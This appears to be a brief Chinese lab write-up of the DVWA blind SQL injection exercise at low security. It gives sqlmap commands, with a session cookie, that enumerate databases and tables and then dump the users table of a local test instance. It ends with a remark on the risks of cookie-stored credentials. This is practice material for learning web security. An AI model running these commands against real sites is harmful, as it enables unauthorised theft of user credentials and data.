DVWA-LOW-SQL Injection(blink)
返回信息只有存在和不存在


反正就是盲注了。这里使用sqlmap进行注入测试。
1.获取数据库名
DVWA页面是有登录凭证的,sqlmap测试链接也应该带上。

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch --dbs
跑完后拿到了所有的数据库名

2.获取当前数据库
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch --current-db

3.获取当前数据库下所有表名
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch -D dvwa --tables

很明显目标在users表中
4.获取users表所有数据
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=roq80ijctambl3tpnn5q150k72; security=low" --batch -D dvwa -T users --dump

end
后记:cookie存储登录等凭证有风险,敏感信息加密算法不能太简单。

浙公网安备 33010602011771号